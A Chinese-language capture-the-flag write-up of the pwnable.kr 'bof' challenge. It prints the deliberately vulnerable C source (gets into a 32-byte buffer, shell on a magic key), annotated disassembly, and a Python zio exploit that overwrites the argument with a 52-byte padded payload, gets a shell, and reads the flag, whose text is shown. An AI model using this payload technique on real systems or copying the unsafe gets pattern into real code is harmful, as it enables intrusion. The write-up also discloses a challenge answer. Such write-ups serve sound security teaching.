Nana told me that buffer overflow is one of the most common software vulnerability.
Is that true?

Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

簡(jiǎn)單的棧溢出練習(xí)。
源碼如下：

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

這里需要構(gòu)造棧溢出，淹沒至前一個(gè)棧幀的當(dāng)前函數(shù)的參數(shù)位置。
linux下可以借助gdb進(jìn)行動(dòng)態(tài)調(diào)試，利用objdump進(jìn)行靜態(tài)反編譯。
這里可使用objdump來靜態(tài)查看棧分配情況objdump -d bof：
由題設(shè)只需關(guān)注main()和func()

0000062c <func>:
 62c:   55                      push   %ebp
 62d:   89 e5                   mov    %esp,%ebp
 62f:   83 ec 48                sub    $0x48,%esp
 632:   65 a1 14 00 00 00       mov    %gs:0x14,%eax
 638:   89 45 f4                mov    %eax,-0xc(%ebp)
 63b:   31 c0                   xor    %eax,%eax
 63d:   c7 04 24 8c 07 00 00    movl   $0x78c,(%esp)
 644:   e8 fc ff ff ff          call   645 <func+0x19>   ; call printf()
 649:   8d 45 d4                lea    -0x2c(%ebp),%eax  ; char[32] -- offset to ebp
 64c:   89 04 24                mov    %eax,(%esp)       ; 傳參
 64f:   e8 fc ff ff ff          call   650 <func+0x24>   ; call gets()
 654:   81 7d 08 be ba fe ca    cmpl   $0xcafebabe,0x8(%ebp)
 65b:   75 0e                   jne    66b <func+0x3f>
 65d:   c7 04 24 9b 07 00 00    movl   $0x79b,(%esp)
 664:   e8 fc ff ff ff          call   665 <func+0x39>
 669:   eb 0c                   jmp    677 <func+0x4b>
 66b:   c7 04 24 a3 07 00 00    movl   $0x7a3,(%esp)
 672:   e8 fc ff ff ff          call   673 <func+0x47>
 677:   8b 45 f4                mov    -0xc(%ebp),%eax
 67a:   65 33 05 14 00 00 00    xor    %gs:0x14,%eax
 681:   74 05                   je     688 <func+0x5c>
 683:   e8 fc ff ff ff          call   684 <func+0x58>
 688:   c9                      leave  
 689:   c3                      ret    

0000068a <main>:
 68a:   55                      push   %ebp
 68b:   89 e5                   mov    %esp,%ebp
 68d:   83 e4 f0                and    $0xfffffff0,%esp
 690:   83 ec 10                sub    $0x10,%esp
 693:   c7 04 24 ef be ad de    movl   $0xdeadbeef,(%esp)
 69a:   e8 8d ff ff ff          call   62c <func>
 69f:   b8 00 00 00 00          mov    $0x0,%eax
 6a4:   c9                      leave  
 6a5:   c3                      ret    
 6a6:   90                      nop

可以發(fā)現(xiàn) char overflowme[32] 在當(dāng)前棧幀中距離EBP的偏移為0x2c，即44，再加上ESP的4，返回地址的4，即從局部變量overflowme首地址52byte的位置即為當(dāng)前函數(shù)的參數(shù)key的地址。
借助python庫zio（an easy-to-use io library for pwning development, supporting an unified interface for local process pwning and TCP socket io.）寫腳本跑出flag。

from zio import *
host = "pwnable.kr" #143.248.249.64
port = 9000
io = zio((host, port), print_read=False, print_write=False)
payload = "a"*52 + "\xbe\xba\xfe\xca" + "\n"
io.write(payload+"\n")
io.write("cat flag\n")
buf = io.read_until("\n")
print buf

$ python run.py
daddy, I just pwned a buFFer :)